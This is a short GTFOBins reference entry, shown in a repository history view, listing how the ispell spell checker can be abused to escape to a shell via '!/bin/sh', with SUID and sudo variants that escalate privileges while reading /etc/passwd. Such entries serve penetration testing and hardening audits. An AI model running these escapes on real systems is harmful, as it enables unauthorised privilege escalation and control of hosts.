GTFOBins.github.io/_gtfobins/ispell.md

16 lines
228 B
Markdown
Raw Normal View History

2022-01-26 22:06:33 +00:00
---
functions:
shell:
- code: |
ispell /etc/passwd
!/bin/sh
suid:
- code: |
./ispell /etc/passwd
!/bin/sh -p
sudo:
- code: |
sudo ispell /etc/passwd
!/bin/sh
---